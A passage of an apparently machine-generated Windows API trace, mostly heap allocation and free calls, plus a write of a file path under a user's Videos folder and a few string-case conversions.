hHeap=0x8a0000) returned 1 [0198.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0198.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.flyingship.swf\r\n", cchWideChar=75, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 75 [0198.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4b) returned 0x923b28 [0198.523] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.flyingship.swf\r\n", cchWideChar=75, lpMultiByteStr=0x923b28, cbMultiByte=75, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.flyingship.swf\r\n", lpUsedDefaultChar=0x0) returned 75 [0198.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.523] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0198.523] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0198.523] WriteFile (in: hFile=0x158, lpBuffer=0x9238c0*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9238c0*, lpNumberOfBytesWritten=0x87f43c*=0x4a, lpOverlapped=0x0) returned 1 [0198.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0198.524] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0198.524] CloseHandle (hObject=0x158) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0198.525] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0198.525] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c00 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0198.525] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.526] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.526] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0198.527] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.527] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.527] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0198.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0198.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b30 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.527] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba540 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0198.527] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0198.527] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0198.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0198.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0198.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0198.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.528] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.528] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.529] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.529] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0198.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0198.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0198.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0198.530] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0198.530] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.530] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.531] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.531] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0198.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0198.532] HeapFree (in: 